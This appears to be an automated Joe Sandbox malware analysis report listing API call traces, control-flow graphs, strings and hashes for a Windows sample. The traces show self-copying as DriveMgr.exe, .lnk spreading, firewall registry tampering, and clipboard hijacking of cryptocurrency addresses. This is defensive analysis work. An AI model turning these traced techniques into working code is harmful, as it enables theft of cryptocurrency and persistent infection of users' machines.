Sleep MoveFileW InternetOpenUrlA 331->343 348 9b3299-9b32a5 332->348 336->302 366 9b3840-9b3842 ExitProcess 336->366 337->336 349 9b2f2c-9b2f36 338->349 339->325 341->311 354 9b358a-9b35a5 DeleteFileW MoveFileW 341->354 342->332 357 9b3176-9b31d8 MoveFileA ShowWindow SetForegroundWindow DeleteFileA Sleep InternetOpenA 342->357 355 9b30d9-9b3121 CopyFileA Sleep DeleteFileA MoveFileW Sleep DeleteFileW 343->355 356 9b3127-9b3139 InternetCloseHandle Sleep 343->356 382 9b39ab-9b39b2 RegCloseKey 344->382 383 9b393e-9b39a5 call 9b0140 * 2 RegSetValueExA * 2 RegCloseKey 344->383 345->344 362 9b3317-9b3324 PathFileExistsA 348->362 363 9b32a7-9b32c1 FindWindowA 348->363 349->339 352 9b2f38-9b2f74 DeleteFileW Sleep MoveFileW Sleep DeleteFileA 349->352 352->349 354->341 355->356 356->342 374 9b3278-9b327f InternetCloseHandle 357->374 375 9b31de-9b3205 InternetOpenUrlA 357->375 376 9b3d35-9b3d3c 359->376 360->359 367 9b3362-9b337c FindWindowA 362->367 368 9b3326-9b335c DeleteFileA Sleep DeleteFileW Sleep MoveFileW 362->368 364 9b32c3-9b330f DeleteFileA MoveFileW Sleep CopyFileA Sleep 363->364 365 9b3315 363->365 364->365 365->348 379 9b3412-9b341c 367->379 380 9b3382-9b340c Sleep DeleteFileA DeleteFileW SetForegroundWindow MoveFileW ShowWindow MoveFileW * 2 Sleep CloseWindow Sleep 367->380 368->367 374->332 384 9b324a-9b3272 InternetCloseHandle Sleep DeleteFileA Sleep 375->384 385 9b3207-9b3244 CopyFileA Sleep MoveFileW Sleep DeleteFileW 375->385 386 9b3f03-9b3f0a 376->386 387 9b3d42-9b3d57 Sleep 376->387 389 9b342d-9b3437 379->389 380->379 382->305 383->382 384->374 385->384 392 9b3d68-9b3d6f 387->392 389->301 396 9b3439-9b3475 Sleep DeleteFileW DeleteFileA MoveFileW DeleteFileW 389->396 393 9b3e1e-9b3e5e Sleep ??2@YAPAXI@Z call 9aeb80 392->393 394 9b3d75-9b3d8a Sleep 392->394 414 9b3ef3-9b3efe Sleep 393->414 415 9b3e64-9b3e6e 393->415 399 9b3d9b-9b3da2 394->399 396->389 405 9b3e19 399->405 406 9b3da4-9b3e03 Sleep wsprintfA call 9b0370 399->406 405->392 421 9b3e05-9b3e11 call 9b0410 406->421 422 9b3e14 406->422 414->376 419 9b3e7f-9b3e86 415->419 424 9b3ee8-9b3eee call 9aeec0 419->424 425 9b3e88-9b3ee6 Sleep wsprintfA call 9b11e0 419->425 421->422 422->399 424->414 425->419
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 009B2D30
              • FindWindowA.USER32(w4tw84thw4h8th8w4h8t,00000000), ref: 009B2D63
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2D81
              • Sleep.KERNEL32(000007D0), ref: 009B2D8C
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2D97
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4yw4t4tw4twyw4y), ref: 009B2DA7
              • Sleep.KERNEL32(000007D0), ref: 009B2DD9
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B2DE9
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B2DF9
              • Sleep.KERNEL32(00000FA0), ref: 009B2E04
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2E0F
              • Sleep.KERNEL32(000003E8), ref: 009B2E1C
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B2E27
              • Sleep.KERNEL32(00001770), ref: 009B2E32
              • PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B347C
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B348F
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B34C6
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B34D1
              • Sleep.KERNEL32(00001388), ref: 009B34DE
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B34EB
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B3505
              • SetForegroundWindow.USER32(?), ref: 009B3512
              • SetFocus.USER32(?), ref: 009B351F
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B352A
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B353A
              • Sleep.KERNEL32(000000C8), ref: 009B3545
              • CloseWindow.USER32(?), ref: 009B3552
              • Sleep.KERNEL32(00000FA0), ref: 009B355D
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B358F
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B359F
              • Sleep.KERNELBASE(000001F4), ref: 009B35C0
              • memset.MSVCRT ref: 009B35D4
              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B35F6
              • rand.MSVCRT ref: 009B35FC
              • rand.MSVCRT ref: 009B3610
              • rand.MSVCRT ref: 009B3624
              • wsprintfW.USER32 ref: 009B364B
              • wsprintfW.USER32 ref: 009B366E
              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 009B3680
              • Sleep.KERNELBASE(000003E8), ref: 009B3693
              • CopyFileW.KERNELBASE(?,?,00000000), ref: 009B36A9
              • Sleep.KERNELBASE(000003E8), ref: 009B36BC
              • wsprintfW.USER32 ref: 009B36DC
              • SetFileAttributesW.KERNELBASE(?,00000007), ref: 009B36EE
              • SetFileAttributesW.KERNELBASE(?,00000007), ref: 009B36FD
              • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 009B371B
              • wcslen.MSVCRT ref: 009B372C
              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B3852
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B387B
              • RegSetValueExA.ADVAPI32(?,00000000,?,00000004,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B38AD
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B38D6
              • RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B390B
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B3934
              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 009B3977
              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 009B3998
              • RegCloseKey.ADVAPI32(?,?,?,?,00000000,000F003F,?), ref: 009B39A5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: File$Sleep$Delete$Move$OpenWindow$Valuerandwsprintf$AttributesCloseCreateFind$CopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
              • String ID: e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4yw4t4tw4twyw4y
              • API String ID: 1434077179-1752865879
              • Opcode ID: 2fe90c659aea2248d0cde16d05a7eeafbe2f415483edf0c02526eef8a5cbdfe2
              • Instruction ID: 83e851d1f76a5fd4ea0daab5acb50d582cbcc42edd4f1f313bfe23fde630de04
              • Opcode Fuzzy Hash: 2fe90c659aea2248d0cde16d05a7eeafbe2f415483edf0c02526eef8a5cbdfe2
              • Instruction Fuzzy Hash: 91113770A68254DFD7109B94DE0EBEC76B0BF81729F0186C9E24AA5190C7B04AC4EF52
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 441 9b0080-9b00e0 memset * 2 CreateProcessW 442 9b00e2-9b00ef Sleep 441->442 443 9b00f1-9b0120 Sleep ShellExecuteW 441->443 444 9b0133-9b0136 442->444 445 9b0122-9b012f Sleep 443->445 446 9b0131 443->446 445->444 446->444
              APIs
              • memset.MSVCRT ref: 009B008E
              • memset.MSVCRT ref: 009B009E
              • CreateProcessW.KERNELBASE(00000000,009B0771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009B00D7
              • Sleep.KERNELBASE(000003E8), ref: 009B00E7
              • Sleep.KERNEL32(000003E8), ref: 009B00F6
              • ShellExecuteW.SHELL32(00000000,open,009B0771,00000000,00000000,00000000), ref: 009B010D
              • Sleep.KERNEL32(000003E8), ref: 009B0127
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Sleep$memset$CreateExecuteProcessShell
              • String ID: $D$open
              • API String ID: 4117032385-2182757814
              • Opcode ID: 92ce93860df5dbb8864e8ac07c4c151763c5cf58edea198edbe387002a975c52
              • Instruction ID: 4f4963b9ac649fa18a17c3daa8f574171c0ab6b19de2a95d7edd2df558e178aa
              • Opcode Fuzzy Hash: 92ce93860df5dbb8864e8ac07c4c151763c5cf58edea198edbe387002a975c52
              • Instruction Fuzzy Hash: FE114271A98308BBEB10DF94DE46FDE7778AB55B10F100215F7096F1C0DAB19A00DB55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 447 9b427a-9b42ef __set_app_type __p__fmode __p__commode call 9b43f9 450 9b42fd-9b4354 call 9b43e4 _initterm __getmainargs _initterm 447->450 451 9b42f1-9b42fc __setusermatherr 447->451 454 9b4390-9b4393 450->454 455 9b4356-9b435e 450->455 451->450 456 9b436d-9b4371 454->456 457 9b4395-9b4399 454->457 458 9b4360-9b4362 455->458 459 9b4364-9b4367 455->459 461 9b4373-9b4375 456->461 462 9b4377-9b4388 GetStartupInfoA 456->462 457->454 458->455 458->459 459->456 460 9b4369-9b436a 459->460 460->456 461->460 461->462 463 9b439b-9b439d 462->463 464 9b438a-9b438e 462->464 465 9b439e-9b43a9 GetModuleHandleA call 9b1360 463->465 464->465 467 9b43ae-9b43cb exit _XcptFilter 465->467
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
              • String ID:
              • API String ID: 801014965-0
              • Opcode ID: 843b44e65c6122d7db047517038e588c2a58250530f44c22099b0df88b2cf863
              • Instruction ID: fe202910d3200a30643a50dafb81488d234e9ce1a8926ec05256ef417e1fc338
              • Opcode Fuzzy Hash: 843b44e65c6122d7db047517038e588c2a58250530f44c22099b0df88b2cf863
              • Instruction Fuzzy Hash: 0E418171818348AFDB24AFA8DF49BE97BF8FB49734F24021AF551972A2D7744841EB10
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 592 9b0b30-9b0b45 call 9b41c0 595 9b0b4e-9b0c00 wsprintfW * 5 PathFileExistsW 592->595 596 9b0b47-9b0b49 592->596 598 9b0c02-9b0c23 call 9b01e0 595->598 599 9b0c44-9b0c53 PathFileExistsW 595->599 597 9b0fe7-9b0fea 596->597 598->599 608 9b0c25-9b0c3e SetFileAttributesW DeleteFileW 598->608 601 9b0cbc-9b0ccb PathFileExistsW 599->601 602 9b0c55-9b0c64 PathFileExistsW 599->602 606 9b0ccd-9b0cd3 601->606 607 9b0d20-9b0d41 FindFirstFileW 601->607 604 9b0c88-9b0c97 PathFileExistsW 602->604 605 9b0c66-9b0c77 CreateDirectoryW 602->605 604->601 612 9b0c99-9b0cb6 CopyFileW SetFileAttributesW 604->612 605->604 611 9b0c79-9b0c82 SetFileAttributesW 605->611 613 9b0cd5-9b0cf2 call 9b0930 606->613 614 9b0cf4-9b0d0e call 9b0930 606->614 609 9b0fe1 607->609 610 9b0d47-9b0ddb 607->610 608->599 609->597 617 9b0de1-9b0df5 lstrcmpW 610->617 611->604 612->601 622 9b0d11-9b0d1a SetFileAttributesW 613->622 614->622 620 9b0e0d 617->620 621 9b0df7-9b0e0b lstrcmpW 617->621 624 9b0fb8-9b0fce FindNextFileW 620->624 621->620 623 9b0e12-9b0e23 621->623 622->607 626 9b0e25-9b0e2e 623->626 627 9b0e34-9b0e3b 623->627 624->617 625 9b0fd4-9b0fdb FindClose 624->625 625->609 626->627 628 9b0e69-9b0e72 627->628 629 9b0e3d-9b0e5a lstrcmpiW 627->629 630 9b0e79-9b0e8a 628->630 631 9b0e74 628->631 632 9b0e5e-9b0e65 629->632 633 9b0e5c 629->633 634 9b0e9b-9b0ea2 630->634 635 9b0e8c-9b0e95 630->635 631->624 632->628 633->626 636 9b0f12-9b0f1b 634->636 637 9b0ea4-9b0ec1 PathMatchSpecW 634->637 635->634 638 9b0f1d 636->638 639 9b0f22-9b0f31 PathFileExistsW 636->639 640 9b0ec3 637->640 641 9b0ec5-9b0f0b wsprintfW SetFileAttributesW DeleteFileW 637->641 638->624 642 9b0f38-9b0f88 wsprintfW * 2 639->642 643 9b0f33 639->643 640->635 641->636 644 9b0f8a-9b0fa0 call 9b09f0 642->644 645 9b0fa2-9b0fb2 MoveFileExW 642->645 643->624 644->624 645->624
              APIs
              • wsprintfW.USER32 ref: 009B0B6F
              • wsprintfW.USER32 ref: 009B0B8F
              • wsprintfW.USER32 ref: 009B0BAF
              • wsprintfW.USER32 ref: 009B0BCF
              • wsprintfW.USER32 ref: 009B0BE8
              • PathFileExistsW.SHLWAPI(?), ref: 009B0BF8
              • SetFileAttributesW.KERNEL32(?,00000080), ref: 009B0C31
              • DeleteFileW.KERNEL32(?), ref: 009B0C3E
              • PathFileExistsW.SHLWAPI(?), ref: 009B0C4B
              • PathFileExistsW.SHLWAPI(?), ref: 009B0C5C
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 009B0C6F
              • SetFileAttributesW.KERNEL32(?,00000007), ref: 009B0C82
              • PathFileExistsW.SHLWAPI(?), ref: 009B0C8F
              • CopyFileW.KERNEL32(009BA128,?,00000000), ref: 009B0CA7
              • SetFileAttributesW.KERNEL32(?,00000001), ref: 009B0CB6
              • PathFileExistsW.SHLWAPI(?), ref: 009B0CC3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: File$ExistsPathwsprintf$Attributes$CopyCreateDeleteDirectory
              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$shell32.dll$shell32.dll
              • API String ID: 3616058356-572023173
              • Opcode ID: 2f99b9f7caeccdecf41f96f942689b3e4ce3ceccc4b6f641ccaf7404d7d5ac67
              • Instruction ID: 0dd74467e64bfca42182fbb3f7970168924f9dc67dd842b661bbce97a6f266d6
              • Opcode Fuzzy Hash: 2f99b9f7caeccdecf41f96f942689b3e4ce3ceccc4b6f641ccaf7404d7d5ac67
              • Instruction Fuzzy Hash: 7DC182B19183189BCB24DFA4DE44FEAB7B8BF84324F4046D8F109A6191D770DA94DFA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
              • String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
              • API String ID: 2251388001-1408303297
              • Opcode ID: 280ef08ef635ef434f16e9f85484867526d523f1ed5436bed0810753667d160e
              • Instruction ID: e0cb268d0d00dd85c8ec08dce98af93600380b9849ea539e03ac22394c2e1d98
              • Opcode Fuzzy Hash: 280ef08ef635ef434f16e9f85484867526d523f1ed5436bed0810753667d160e
              • Instruction Fuzzy Hash: 6E123075A04258ABCB14CF94C5F45BE7FBAAF43366F6480A9D8959F215C7389E80CBC0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockiswalphaiswdigitlstrlenmemcpywcslen
              • String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
              • API String ID: 2964143298-1408303297
              • Opcode ID: 01932c4524f4fd1117cd318260d2d67de721cd10cfaa85bd4f71c489a9e076ec
              • Instruction ID: 62fd6264e1e2e508e6a405aa96eb707e1c0cf40e85af0510bc6e659d3fcf2e45
              • Opcode Fuzzy Hash: 01932c4524f4fd1117cd318260d2d67de721cd10cfaa85bd4f71c489a9e076ec
              • Instruction Fuzzy Hash: 96127670A04219EBCF688F80C5A45BD7BB6AF837A5F608469F8859B250D734DEC1DBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1401 9afe60-9afe92 CryptImportKey 1402 9afe98-9afeb8 CreateFileW 1401->1402 1403 9b0076-9b007c 1401->1403 1404 9afebe-9afed1 GetFileSize 1402->1404 1405 9b006c-9b0070 CryptDestroyKey 1402->1405 1406 9b0062-9b0066 CloseHandle 1404->1406 1407 9afed7-9afef2 CreateFileMappingA 1404->1407 1405->1403 1406->1405 1408 9afef8-9aff11 MapViewOfFile 1407->1408 1409 9b003e-9b0044 1407->1409 1411 9aff17-9aff20 1408->1411 1412 9b0034-9b0038 CloseHandle 1408->1412 1409->1406 1410 9b0046-9b005c SetFilePointer SetEndOfFile 1409->1410 1410->1406 1413 9b002a-9b002e UnmapViewOfFile 1411->1413 1414 9aff26-9aff2d 1411->1414 1412->1409 1413->1412 1414->1413 1415 9aff33-9aff3c 1414->1415 1415->1413 1416 9aff42-9aff5e CryptCreateHash 1415->1416 1416->1413 1417 9aff64-9affa1 GetProcessHeap HeapAlloc 1416->1417 1417->1413 1418 9affa7-9affdc call 9afd80 CryptHashData 1417->1418 1421 9affde-9afffd CryptVerifySignatureA 1418->1421 1422 9b0017-9b0024 GetProcessHeap HeapFree 1418->1422 1421->1422 1423 9affff-9b0014 memcpy 1421->1423 1422->1413 1423->1422
              APIs
              • CryptImportKey.ADVAPI32(015379A0,009B5940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFE8A
              • CreateFileW.KERNEL32(009B0750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFEAB
              • GetFileSize.KERNEL32(000000FF,00000000), ref: 009AFEC4
              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 009AFEE5
              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 009AFF04
              • CryptCreateHash.ADVAPI32(015379A0,00008004,00000000,00000000,?), ref: 009AFF56
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009AFF8D
              • HeapAlloc.KERNEL32(00000000), ref: 009AFF94
                • Part of subcall function 009AFD80: memcpy.MSVCRT ref: 009AFDDF
                • Part of subcall function 009AFD80: memcpy.MSVCRT ref: 009AFDF3
                • Part of subcall function 009AFD80: CryptImportKey.ADVAPI32(015379A0,00000008,0000001C,00000000,00000000,00000000), ref: 009AFE17
                • Part of subcall function 009AFD80: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 009AFE3D
                • Part of subcall function 009AFD80: CryptDestroyKey.ADVAPI32(00000000), ref: 009AFE50
              • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 009AFFD4
              • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 009AFFF5
              • memcpy.MSVCRT ref: 009B000F
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B001D
              • HeapFree.KERNEL32(00000000), ref: 009B0024
              • UnmapViewOfFile.KERNEL32(00000000), ref: 009B002E
              • CloseHandle.KERNEL32(00000000), ref: 009B0038
              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 009B0052
              • SetEndOfFile.KERNEL32(000000FF), ref: 009B005C
              • CloseHandle.KERNEL32(000000FF), ref: 009B0066
              • CryptDestroyKey.ADVAPI32(00000000), ref: 009B0070
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
              • String ID: NGS!
              • API String ID: 1316431928-4070929822
              • Opcode ID: bf2f8dd8b0acd37f26faf0ee91cf8f8ca7b19b755bc58ec764833ad217e0c5f4
              • Instruction ID: d09e838bce7eb934395ec5a333996112a4aa228ec9b9d0bb6f7190609960085b
              • Opcode Fuzzy Hash: bf2f8dd8b0acd37f26faf0ee91cf8f8ca7b19b755bc58ec764833ad217e0c5f4
              • Instruction Fuzzy Hash: 35613F75A14209AFDB14EFE4DE49FAFB7B9BB88710F108548F605B7280C775A940DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1614 9b09f0-9b0a3f CreateDirectoryW wsprintfW FindFirstFileW 1615 9b0b1f-9b0b22 1614->1615 1616 9b0a45-9b0a59 lstrcmpW 1614->1616 1617 9b0a5b-9b0a6f lstrcmpW 1616->1617 1618 9b0a71 1616->1618 1617->1618 1620 9b0a73-9b0abc wsprintfW * 2 1617->1620 1619 9b0aec-9b0b02 FindNextFileW 1618->1619 1619->1616 1623 9b0b08-9b0b19 FindClose RemoveDirectoryW 1619->1623 1621 9b0abe-9b0ad4 call 9b09f0 1620->1621 1622 9b0ad6-9b0ae6 MoveFileExW 1620->1622 1621->1619 1622->1619 1623->1615
              APIs
              • CreateDirectoryW.KERNEL32(009B0F9D,00000000), ref: 009B09FF
              • wsprintfW.USER32 ref: 009B0A15
              • FindFirstFileW.KERNEL32(?,?), ref: 009B0A2C
              • lstrcmpW.KERNEL32(?,009B7048), ref: 009B0A51
              • lstrcmpW.KERNEL32(?,009B704C), ref: 009B0A67
              • wsprintfW.USER32 ref: 009B0A8A
              • wsprintfW.USER32 ref: 009B0AAA
              • MoveFileExW.KERNEL32(?,?,00000009), ref: 009B0AE6
              • FindNextFileW.KERNEL32(000000FF,?), ref: 009B0AFA
              • FindClose.KERNEL32(000000FF), ref: 009B0B0F
              • RemoveDirectoryW.KERNEL32(?), ref: 009B0B19
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
              • String ID: %s\%s$%s\%s$%s\*
              • API String ID: 92872011-445461498
              • Opcode ID: e9048740669fa763a96d7df751a3a8b79a219541095cacd9a9b7993941517f93
              • Instruction ID: 964cabf01bb98f5bf13e7cfed0767a865dbd4a81beda08e06ca34c4da5042c33
              • Opcode Fuzzy Hash: e9048740669fa763a96d7df751a3a8b79a219541095cacd9a9b7993941517f93
              • Instruction Fuzzy Hash: 0A3196B55147189FCB10EBA4DD88FEA737CBB84321F408788F60992141EB30DA44CF94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • socket.WS2_32(00000002,00000001,00000006), ref: 009A8E40
              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 009A8E73
              • htons.WS2_32(00000000), ref: 009A8E8C
              • htonl.WS2_32(7F000001), ref: 009A8EA4
              • bind.WS2_32(00000000,?,00000010), ref: 009A8EB9
              • listen.WS2_32(00000000,00000064), ref: 009A8ED0
              • getsockname.WS2_32(00000000,?,00000010), ref: 009A8EF4
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • htons.WS2_32(?), ref: 009A8F2D
              • htons.WS2_32(?), ref: 009A8F56
              • closesocket.WS2_32(00000000), ref: 009A8FB6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
